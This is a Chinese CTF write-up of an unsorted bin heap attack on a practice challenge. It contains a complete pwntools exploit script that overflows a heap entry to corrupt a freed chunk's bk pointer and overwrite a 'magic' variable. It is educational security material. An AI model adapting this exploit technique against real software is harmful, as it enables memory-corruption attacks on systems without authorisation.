【unsorted bin attack】
1.ida分析
2.思路
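- 经典的 unsorted bin attack：修改 unsorted bin 中空闲 chunk 的 bk 为 magic-0x10，下一次 malloc 从 unsorted bin 取出该 chunk 时，会向 bk+0x10（即 magic）写入一个较大的数（unsorted bin 链表头的地址）。该手法依赖旧版 glibc：glibc 2.29 起，malloc 从 unsorted bin 取 chunk 前会校验双向链表的完整性，被篡改的 bk 会使进程直接中止。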
3.exp
from pwn import *
# Open a TCP connection to the challenge service; `p` is the module-level
# tube that add(), edit() and dele() all use.
p = remote('node3.buuoj.cn',25879)
# Debug log level makes pwntools print the raw bytes sent and received,
# which helps when checking prompts against what the service really emits.
context.log_level = 'debug'
def add(size, cont):
    """Drive menu option 1: request a heap entry of `size` bytes holding `cont`.

    Uses the module-level tube `p`. Returns nothing.
    """
    p.sendlineafter('Your choice :', str(1))
    p.sendlineafter('Size of Heap : ', str(size))
    # Content that exactly fills `size` goes out without a trailing newline;
    # anything else is sent as a line (newline appended).
    send = p.sendafter if len(cont) == size else p.sendlineafter
    send('Content of heap:', cont)
def edit(index, size, cont):
    """Drive menu option 2: rewrite entry `index` with `size` bytes of `cont`.

    Uses the module-level tube `p`. Returns nothing.
    """
    p.sendlineafter('Your choice :', str(2))
    p.sendlineafter('Index :', str(index))
    p.sendlineafter('Size of Heap : ', str(size))
    if len(cont) != size:
        # NOTE(review): this prompt string ('Content of heap: ') differs in
        # spacing from the one used below ('Content of heap : '). Only one can
        # match the service's real prompt; confirm which, because waiting on
        # the wrong string would block.
        p.sendlineafter('Content of heap: ', cont)
        return
    # Exact-length content is sent without a trailing newline.
    p.sendafter('Content of heap : ', cont)
def dele(index):
    """Drive menu option 3: delete (free) the entry at `index`.

    Uses the module-level tube `p`. Returns nothing.
    """
    for prompt, answer in (('Your choice :', 3), ('Index :', index)):
        p.sendlineafter(prompt, str(answer))
# Heap layout: four allocations. Presumably they land at indexes 0..3 in
# creation order -- confirm against the binary.
add(0x10,'a')
add(0x80,'b')
add(0x60,'c')
add(0x10,'d')
# Free the 0x80 entry. Per the write-up this chunk goes to the unsorted bin,
# and the entries allocated after it keep it from being merged into the top chunk.
dele(1)
# Payload layout: 0x10 filler bytes for entry 0, then the next chunk's header
# (prev_size = 0, size = 0x91), then its fd = 0 and bk = 0x6020a0-16
# (the write-up's "magic-0x10", so magic is presumably at 0x6020a0).
# NOTE(review): 'b'*0x10 is a str; under Python 3 pwntools p64() returns bytes,
# so this line assumes Python 2 -- confirm the interpreter.
payload = 'b'*0x10 + p64(0) + p64(0x91) + p64(0) +p64(0x6020a0-16)
# The edit writes len(payload) bytes into an entry created with size 0x10.
# Root cause this relies on (inferred, binary not shown): the edit path takes
# a caller-supplied length without checking it against the allocation size.
# Bounding that length by the stored size removes the overflow.
edit(0,len(payload),payload)
# Same-size allocation: takes the freed chunk back out of the unsorted bin,
# which is when the write through the modified bk happens.
add(0x80,'dddd')
# Menu value 4869: presumably the option that checks magic -- confirm in the binary.
p.sendline('4869')
p.interactive()